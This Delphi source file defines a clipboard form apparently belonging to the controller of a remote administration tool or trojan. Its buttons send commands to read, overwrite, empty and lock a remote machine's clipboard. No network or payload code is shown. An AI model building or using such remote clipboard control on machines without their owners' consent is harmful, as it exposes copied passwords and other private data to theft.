(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untClipboard.pas                                ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Clipboard form                   ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untClipboard;

interface

uses
  SysUtils, Classes, Controls, Forms, StdCtrls, Buttons;

type
  TfrmClipboard = class(TForm)
    SpdLock: TSpeedButton;
    SpdUnlock: TSpeedButton;
    SpdEmpty: TSpeedButton;
    SpdSet: TSpeedButton;
    SpdRead: TSpeedButton;
    MemClip: TMemo;
    procedure SpdReadClick(Sender: TObject);
    procedure SpdSetClick(Sender: TObject);
    procedure SpdEmptyClick(Sender: TObject);
    procedure SpdLockClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmClipboard: TfrmClipboard;

implementation

uses untMain, untCommands;
{$R *.DFM}

procedure TfrmClipboard.SpdReadClick(Sender: TObject);
begin
   frmMain.strStatus:='Lecture du Clipboard...';
   frmMain.SendCommand(COMMAND_CLIP_READ,'');
end;

procedure TfrmClipboard.SpdSetClick(Sender: TObject);
begin
   frmMain.strStatus:='Modification du texte...';
   frmMain.SendCommand(COMMAND_CLIP_SET,MemClip.Text);
end;

procedure TfrmClipboard.SpdEmptyClick(Sender: TObject);
begin
   frmMain.strStatus:='vidage du clipboard...';
   frmMain.SendCommand(COMMAND_CLIP_EMPTY,'');
end;

procedure TfrmClipboard.SpdLockClick(Sender: TObject);
var
   Index:Integer;
begin
   Index:=(Sender as TSpeedButton).Tag;
   if Index = 1 then
      frmMain.strStatus:='Lock du clipboard...'
   else
      frmMain.strStatus:='Dlock du clipboard...';
   frmMain.SendCommand(COMMAND_CLIP_LOCK,IntToStr(Index));
end;

procedure TfrmClipboard.FormCreate(Sender: TObject);
begin
   Caption:='Clipboard';
end;

end.
